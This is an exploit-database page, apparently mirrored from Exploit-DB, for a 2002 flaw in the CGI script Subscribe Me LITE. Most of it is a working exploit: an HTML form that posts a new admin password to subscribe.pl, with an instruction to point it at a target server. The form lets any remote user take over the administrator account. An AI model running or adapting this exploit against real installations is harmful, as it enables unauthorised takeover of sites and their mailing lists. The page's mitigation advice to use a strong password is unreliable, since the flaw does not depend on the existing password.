header-logo
Suggest Exploit
vendor:
Subscribe Me LITE
by:
n30
7.5
CVSS
HIGH
Remote Password Modification
287
CWE
Product Name: Subscribe Me LITE
Affected Version From: Subscribe Me LITE
Affected Version To: Subscribe Me LITE
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Subscribe Me LITE Status: Admin Password Set Vulnerability Exploit

Regardless of privilege level, any remote user can modify the administrative password for CGI Script Centers' Subscribe Me Lite. This would grant the user full administrative privileges which includes addition or removal of users from mailing lists.

Mitigation:

Ensure that the administrative password is set to a strong value and is not easily guessable.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1607/info
 
Regardless of privilege level, any remote user can modify the administrative password for CGI Script Centers' Subscribe Me Lite. This would grant the user full administrative privileges which includes addition or removal of users from mailing lists.


<html>
<FORM ACTION="http://www.cgiscriptcenter.com/cgi-bin/subprodemo/subscribe.pl" METHOD="POST">
    <CENTER><BR>
    <TABLE BORDER="0" WIDTH="400">
      <TBODY>
      <TR>
        <TD>
        
        <P><B><FONT FACE="verdana, arial, helvetica"><FONT COLOR="#FF0000">Subscribe
          Me LITE</FONT> Status: Admin Password Set Vulnerability Exploit</FONT></B></P>
        <CENTER><FONT FACE="verdana, arial, helvetica"><FONTCOLOR="#FF0000">n30</FONT></CENTER>
        <P><FONT SIZE="-1" FACE="verdana, arial, helvetica">Please enter the NEW Admin Pass: .</FONT></P>
        <CENTER>
        <TABLE BORDER="0">
          <TBODY>
          <TR>
            <TD ALIGN="RIGHT"><INPUT TYPE="PASSWORD" NAME="pwd"></TD>
            <TD><FONT SIZE="-2" FACE="verdana, arial, helvetica">password</FONT></TD>
          </TR>
          <TR>
            <TD ALIGN="RIGHT"><INPUT TYPE="PASSWORD" NAME="pwd2"></TD>
            <TD><FONT SIZE="-2" FACE="verdana, arial, helvetica">confirmation</FONT></TD>
          </TR>
          <TR>
            <TD ALIGN="CENTER"><BR>
            <INPUT TYPE="SUBMIT" NAME="setpwd" VALUE="  Set Password  "></TD>
            <TD><BR>
            <INPUT TYPE="RESET" NAME=""></TD>
          </TR></TBODY>
        </TABLE></CENTER></TD>
      </TR></TBODY>
    </TABLE>
<FONTSIZE="1" FACE="verdana, arial, helvetica"><B><BR> To Use Modify Source To Point to subscribe.pl on TARGET Server <BR><BR><a href="mailto:n30@alldas.de">mail-me</a></CENTER></FORM>
</html>

Navigation

Suggest Exploit

Services By CQR